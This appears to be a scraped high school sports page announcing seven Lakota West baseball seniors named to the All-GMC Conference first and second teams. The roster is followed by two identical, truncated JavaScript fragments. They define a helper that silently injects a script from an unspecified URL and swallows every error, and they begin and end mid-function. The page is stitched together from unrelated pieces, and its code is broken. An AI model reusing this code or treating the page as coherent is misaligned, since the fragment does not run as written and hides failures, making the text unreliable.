Baseball

7 Firebirds Make All GMC Conference List!

Article found at gmcsports.com

1st Team:
Jacob Beal Lakota West P Senior
Grant Miller Lakota West IF Senior
Carter Rust Lakota West IF Senior

2nd Team:
Connor Crowley Lakota West P Senior
Adrian Davis Lakota West OF Senior
Ethan Vaught Lakota West IF Senior
Brady Weber Lakota West P Senior

Congrats to the whole program on a great season! #WestPride

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts